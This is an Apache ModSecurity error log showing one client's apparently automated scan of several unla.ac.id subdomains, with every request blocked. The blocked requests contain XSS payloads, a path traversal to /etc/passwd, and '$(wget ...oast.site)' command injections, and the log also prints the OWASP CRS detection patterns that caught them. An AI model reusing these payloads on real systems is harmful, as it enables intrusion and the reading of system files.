[Tue Aug 29 11:46:01.410398 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:union\\\\s*?(?:all|distinct|[(!@]*?)?\\\\s*?[([]*?\\\\s*?select\\\\s+)|(?:\\\\w+\\\\s+like\\\\s+[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98])|(?:like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\%)|(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?like\\\\W*?[\\"'`\\xc2\\xb4 ..." at ARGS:where. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "223"] [id "981245"] [msg "Detects basic SQL authentication bypass attempts 2/3"] [data "Matched Data: \\x22><svg o found within ARGS:where: place\\x22><svg onload=confirm(document.domain)>"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "ft.unla.ac.id"] [uri "/7/0/33/1d/www.citysearch.com/search"] [unique_id "ZO14CcCo-f0AAAfSWn0AAAAB"]
[Tue Aug 29 11:46:01.410564 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:where. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onload= found within ARGS:where: place\\x22><svg onload=confirm(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/7/0/33/1d/www.citysearch.com/search"] [unique_id "ZO14CcCo-f0AAAi5uBYAAAAS"]
[Tue Aug 29 11:46:01.425750 2023] [:error] [pid 2144] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:where. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:where: place\\x22><svg onload=confirm(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/7/0/33/1d/www.citysearch.com/search"] [unique_id "ZO14CcCo-f0AAAhgoL4AAAAb"]
[Tue Aug 29 11:46:02.365105 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:page: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/cgiServer.exx"] [unique_id "ZO14CsCo-f0AAAi-Q9kAAAAH"]
[Tue Aug 29 11:46:02.383601 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:where. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:where: place\\x22><svg onload=confirm(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/7/0/33/1d/www.citysearch.com/search"] [unique_id "ZO14CsCo-f0AAAi2yAgAAAAN"]
[Tue Aug 29 11:46:02.388114 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:page: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/cgiServer.exx"] [unique_id "ZO14CsCo-f0AAAi-Q9oAAAAH"]
[Tue Aug 29 11:46:02.388647 2023] [:error] [pid 2011] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:page: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/cgiServer.exx"] [unique_id "ZO14CsCo-f0AAAfbk0wAAAAZ"]
[Tue Aug 29 11:46:02.389156 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:page: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/cgi-bin/cgiServer.exx"] [unique_id "ZO14CsCo-f0AAAi5uBkAAAAS"]
[Tue Aug 29 11:46:02.411056 2023] [:error] [pid 2217] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/InformationService/v3/Json/Query"] [unique_id "ZO14CsCo-f0AAAipS4YAAAAF"]
[Tue Aug 29 11:46:02.419293 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:page: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/cgiServer.exx"] [unique_id "ZO14CsCo-f0AAAhlz@gAAAAi"]
[Tue Aug 29 11:46:02.426873 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/InformationService/v3/Json/Query"] [unique_id "ZO14CsCo-f0AAAhZRi4AAAAG"]
[Tue Aug 29 11:46:02.432874 2023] [:error] [pid 2217] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/InformationService/v3/Json/Query"] [unique_id "ZO14CsCo-f0AAAipS4cAAAAF"]
[Tue Aug 29 11:46:02.434348 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/InformationService/v3/Json/Query"] [unique_id "ZO14CsCo-f0AAAib5wkAAAAA"]
[Tue Aug 29 11:46:02.444862 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:where. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onload= found within ARGS:where: place\\x22><svg onload=confirm(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/7/0/33/1d/www.citysearch.com/search"] [unique_id "ZO14CsCo-f0AAAhtjh8AAAAq"]
[Tue Aug 29 11:46:02.449215 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/InformationService/v3/Json/Query"] [unique_id "ZO14CsCo-f0AAAhZRi8AAAAG"]
[Tue Aug 29 11:46:03.409509 2023] [:error] [pid 2217] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:page: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/cgiServer.exx"] [unique_id "ZO14C8Co-f0AAAipS4oAAAAF"]
[Tue Aug 29 11:46:03.572009 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/SolarWinds/InformationService/v3/Json/Query"] [unique_id "ZO14C8Co-f0AAAi5uB8AAAAS"]
[Tue Aug 29 11:46:04.501202 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/InformationService/v3/Json/Query"] [unique_id "ZO14DMCo-f0AAAfEB5gAAAAO"]
[Tue Aug 29 11:46:07.370370 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:state. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:state: $(wget http:/cjmnbitjmimt14dgn26gky5k6sw8pijcp.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/certmngr.cgi"] [unique_id "ZO14D8Co-f0AAAhBSFYAAAAX"]
[Tue Aug 29 11:46:07.379067 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:state. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:state: $(wget http:/cjmnbitjmimt14dgn26gjzxbpdapuumca.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/certmngr.cgi"] [unique_id "ZO14D8Co-f0AAAi5uCgAAAAS"]
[Tue Aug 29 11:46:07.384046 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:state. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:state: $(wget http:/cjmnbitjmimt14dgn26gog49hb4mg3bem.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/certmngr.cgi"] [unique_id "ZO14D8Co-f0AAAi2yBYAAAAN"]
[Tue Aug 29 11:46:07.399763 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:state. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:state: $(wget http:/cjmnbitjmimt14dgn26ghxgfd3phneofc.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/certmngr.cgi"] [unique_id "ZO14D8Co-f0AAAi5uCkAAAAS"]
[Tue Aug 29 11:46:07.410443 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:state. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:state: $(wget http:/cjmnbitjmimt14dgn26gjpm1pcygcm75x.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/certmngr.cgi"] [unique_id "ZO14D8Co-f0AAAi0JI8AAAAK"]
[Tue Aug 29 11:46:08.352966 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:SEARCH. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:SEARCH: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EMCo-f0AAAdxUpkAAAAC"]
[Tue Aug 29 11:46:08.364282 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:SEARCH. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:SEARCH: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EMCo-f0AAAhT32EAAAAD"]
[Tue Aug 29 11:46:08.379881 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:state. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:state: $(wget http:/cjmnbitjmimt14dgn26gte1xf3p4p7xsk.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/certmngr.cgi"] [unique_id "ZO14EMCo-f0AAAdxUpoAAAAC"]
[Tue Aug 29 11:46:08.408118 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:SEARCH. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:SEARCH: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EMCo-f0AAAib5yUAAAAA"]
[Tue Aug 29 11:46:08.415254 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:SEARCH. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:SEARCH: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EMCo-f0AAAhlz-IAAAAi"]
[Tue Aug 29 11:46:08.430962 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:SEARCH. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:SEARCH: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EMCo-f0AAAib5yYAAAAA"]
